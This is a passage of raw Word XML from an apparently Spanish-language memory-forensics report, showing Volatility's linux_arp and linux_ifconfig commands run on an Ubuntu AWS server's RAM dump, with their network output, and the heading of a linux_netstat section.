      </w:pPr>
    </w:p>
    <w:p w14:paraId="2382CA64"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.[kworker/u30:0]     20886                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F29FB04" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B9B1E17" w14:textId="77777777" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001225E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">.[kworker/0:2]       20898                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFBE6E8" w14:textId="6507BA63" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="427A3698" w14:textId="7C8DBFE5" w:rsidR="001225E9" w:rsidRPr="001225E9" w:rsidRDefault="001225E9" w:rsidP="001225E9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DE484D" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="38C07FAE" w14:textId="649D5A68" w:rsidR="0084399F" w:rsidRDefault="0084399F">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C4AAD4" w14:textId="695D3F9A" w:rsidR="0084399F" w:rsidRPr="00C9562B" w:rsidRDefault="0084399F" w:rsidP="0084399F">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="197" w:name="_Ref155754704"/>
      <w:bookmarkStart w:id="198" w:name="_Toc155782541"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XVII. Comando linux_arp.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="197"/>
      <w:bookmarkEnd w:id="198"/>
    </w:p>
    <w:p w14:paraId="4DDA32B3" w14:textId="77777777" w:rsidR="0084399F" w:rsidRDefault="0084399F" w:rsidP="0084399F"/>
    <w:p w14:paraId="46D7D2E6" w14:textId="77777777" w:rsidR="0084399F" w:rsidRPr="00C9562B" w:rsidRDefault="0084399F" w:rsidP="0084399F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09271BF2" w14:textId="77777777" w:rsidR="0084399F" w:rsidRDefault="0084399F" w:rsidP="0084399F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0084399F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM.mem' linux_arp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236EB346" w14:textId="7FF5861E" w:rsidR="0084399F" w:rsidRPr="00C9562B" w:rsidRDefault="0084399F" w:rsidP="0084399F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E03F9F" w14:textId="77777777" w:rsidR="0084399F" w:rsidRDefault="0084399F" w:rsidP="0084399F"/>
    <w:p w14:paraId="7DF5A3A1" w14:textId="77777777" w:rsidR="0084399F" w:rsidRDefault="0084399F" w:rsidP="0084399F">
      <w:r w:rsidRPr="006A2A95">
        <w:t>La respuesta de la consola es la siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539354C4" w14:textId="77777777" w:rsidR="0084399F" w:rsidRDefault="0084399F" w:rsidP="0084399F">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5627D804" w14:textId="77777777" w:rsidR="0084399F" w:rsidRDefault="0084399F" w:rsidP="000D01C0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3BAB60" w14:textId="77777777" w:rsidR="0030321F" w:rsidRPr="0030321F" w:rsidRDefault="0030321F" w:rsidP="000D01C0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030321F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Volatility Foundation Volatility Framework 2.6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082A4683" w14:textId="77777777" w:rsidR="0030321F" w:rsidRPr="0030321F" w:rsidRDefault="0030321F" w:rsidP="000D01C0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="428873D6" w14:textId="77777777" w:rsidR="0030321F" w:rsidRPr="0030321F" w:rsidRDefault="0030321F" w:rsidP="000D01C0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030321F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>[172.31.32.1                               ] at 06:b7:00:d7:1c:58    on eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DFD1C0" w14:textId="77777777" w:rsidR="0030321F" w:rsidRPr="0030321F" w:rsidRDefault="0030321F" w:rsidP="000D01C0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07D0A59F" w14:textId="77777777" w:rsidR="0030321F" w:rsidRPr="0030321F" w:rsidRDefault="0030321F" w:rsidP="000D01C0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030321F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>[172.31.33.128                             ] at 06:4a:d2:f8:73:c0    on eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7E9B81" w14:textId="77777777" w:rsidR="0030321F" w:rsidRPr="0030321F" w:rsidRDefault="0030321F" w:rsidP="000D01C0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A6E862C" w14:textId="77777777" w:rsidR="0030321F" w:rsidRPr="0030321F" w:rsidRDefault="0030321F" w:rsidP="000D01C0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030321F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>[0.0.0.0                                   ] at 00:00:00:00:00:00    on lo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2054CB" w14:textId="77777777" w:rsidR="0030321F" w:rsidRPr="0030321F" w:rsidRDefault="0030321F" w:rsidP="000D01C0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D1E35C7" w14:textId="77777777" w:rsidR="0030321F" w:rsidRPr="0030321F" w:rsidRDefault="0030321F" w:rsidP="000D01C0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030321F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>[ff02::2                                   ] at 33:33:00:00:00:02    on eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C61BAAC" w14:textId="77777777" w:rsidR="0030321F" w:rsidRPr="0030321F" w:rsidRDefault="0030321F" w:rsidP="000D01C0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B01ED6E" w14:textId="77777777" w:rsidR="0030321F" w:rsidRPr="0030321F" w:rsidRDefault="0030321F" w:rsidP="000D01C0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030321F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>[ff02::1:fff6:512c                         ] at 33:33:ff:f6:51:2c    on eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C434AE6" w14:textId="77777777" w:rsidR="0030321F" w:rsidRPr="0030321F" w:rsidRDefault="0030321F" w:rsidP="000D01C0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13FE8282" w14:textId="77777777" w:rsidR="0030321F" w:rsidRPr="0030321F" w:rsidRDefault="0030321F" w:rsidP="000D01C0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030321F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>[ff02::16                                  ] at 33:33:00:00:00:16    on eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9D417B" w14:textId="77777777" w:rsidR="0030321F" w:rsidRPr="0030321F" w:rsidRDefault="0030321F" w:rsidP="000D01C0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25E17E49" w14:textId="77777777" w:rsidR="0030321F" w:rsidRPr="0030321F" w:rsidRDefault="0030321F" w:rsidP="000D01C0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030321F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>[::1                                       ] at 00:00:00:00:00:00    on lo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75522F10" w14:textId="77777777" w:rsidR="0084399F" w:rsidRDefault="0084399F" w:rsidP="000D01C0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26D30227" w14:textId="71537BFC" w:rsidR="0084399F" w:rsidRPr="00FB41B7" w:rsidRDefault="0084399F" w:rsidP="000D01C0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32077EEF" w14:textId="2587779B" w:rsidR="000D01C0" w:rsidRDefault="000D01C0" w:rsidP="000D01C0">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BC3DB9" w14:textId="17FDB4FF" w:rsidR="000D01C0" w:rsidRPr="00C9562B" w:rsidRDefault="000D01C0" w:rsidP="000D01C0">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="199" w:name="_Ref155754816"/>
      <w:bookmarkStart w:id="200" w:name="_Toc155782542"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XVIII. Comando linux_ifconfig.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="199"/>
      <w:bookmarkEnd w:id="200"/>
    </w:p>
    <w:p w14:paraId="149895D6" w14:textId="77777777" w:rsidR="000D01C0" w:rsidRDefault="000D01C0" w:rsidP="000D01C0"/>
    <w:p w14:paraId="3CB8EBFD" w14:textId="77777777" w:rsidR="000D01C0" w:rsidRPr="00C9562B" w:rsidRDefault="000D01C0" w:rsidP="000D01C0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEE806D" w14:textId="3B0507FD" w:rsidR="000D01C0" w:rsidRPr="00C9562B" w:rsidRDefault="000D01C0" w:rsidP="000D01C0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D01C0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM.mem' linux_ifconfig</w:t>
      </w:r>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C19A4E" w14:textId="77777777" w:rsidR="000D01C0" w:rsidRDefault="000D01C0" w:rsidP="000D01C0"/>
    <w:p w14:paraId="394991D4" w14:textId="77777777" w:rsidR="000D01C0" w:rsidRDefault="000D01C0" w:rsidP="000D01C0">
      <w:r w:rsidRPr="006A2A95">
        <w:t>La respuesta de la consola es la siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566C56A5" w14:textId="77777777" w:rsidR="000D01C0" w:rsidRDefault="000D01C0" w:rsidP="000D01C0">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1544CF9C" w14:textId="77777777" w:rsidR="000D01C0" w:rsidRDefault="000D01C0" w:rsidP="000D01C0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52234743" w14:textId="77777777" w:rsidR="000D01C0" w:rsidRPr="000D01C0" w:rsidRDefault="000D01C0" w:rsidP="000D01C0">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D01C0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Volatility Foundation Volatility Framework 2.6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E71AB5C" w14:textId="77777777" w:rsidR="000D01C0" w:rsidRPr="000D01C0" w:rsidRDefault="000D01C0" w:rsidP="000D01C0">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56B66DD1" w14:textId="77777777" w:rsidR="000D01C0" w:rsidRPr="000D01C0" w:rsidRDefault="000D01C0" w:rsidP="000D01C0">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D01C0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Interface        IP Address           MAC Address        Promiscous Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C7AFFA" w14:textId="77777777" w:rsidR="000D01C0" w:rsidRPr="000D01C0" w:rsidRDefault="000D01C0" w:rsidP="000D01C0">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F9FC6B7" w14:textId="77777777" w:rsidR="000D01C0" w:rsidRPr="000D01C0" w:rsidRDefault="000D01C0" w:rsidP="000D01C0">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D01C0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---------------- -------------------- ------------------ ---------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB6F591" w14:textId="77777777" w:rsidR="000D01C0" w:rsidRPr="000D01C0" w:rsidRDefault="000D01C0" w:rsidP="000D01C0">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F972184" w14:textId="77777777" w:rsidR="000D01C0" w:rsidRPr="000D01C0" w:rsidRDefault="000D01C0" w:rsidP="000D01C0">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D01C0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">lo               127.0.0.1            00:00:00:00:00:00  False          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F79D28" w14:textId="77777777" w:rsidR="000D01C0" w:rsidRPr="000D01C0" w:rsidRDefault="000D01C0" w:rsidP="000D01C0">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03ED7FED" w14:textId="77777777" w:rsidR="000D01C0" w:rsidRPr="000D01C0" w:rsidRDefault="000D01C0" w:rsidP="000D01C0">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D01C0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">eth0             172.31.38.110        06:4c:cd:f6:51:2c  False          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59044AF3" w14:textId="77777777" w:rsidR="0084399F" w:rsidRDefault="0084399F" w:rsidP="000D01C0">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37CDB4AA" w14:textId="288F849F" w:rsidR="001225E9" w:rsidRDefault="001225E9" w:rsidP="000D01C0">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="14ECFCB0" w14:textId="063125F2" w:rsidR="00FB41B7" w:rsidRPr="00C9562B" w:rsidRDefault="00FB41B7" w:rsidP="00FB41B7">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="201" w:name="_Ref155740457"/>
      <w:bookmarkStart w:id="202" w:name="_Toc155782543"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XI</w:t>
      </w:r>
      <w:r w:rsidR="000D01C0">
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>. Comando linux_</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB41B7">
        <w:t>netstat</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="201"/>
      <w:bookmarkEnd w:id="202"/>
    </w:p>
    <w:p w14:paraId="7D8A2BB3" w14:textId="77777777" w:rsidR="00FB41B7" w:rsidRDefault="00FB41B7" w:rsidP="00FB41B7"/>
    <w:p w14:paraId="52E10FC5" w14:textId="77777777" w:rsidR="00FB41B7" w:rsidRPr="00C9562B" w:rsidRDefault="00FB41B7" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
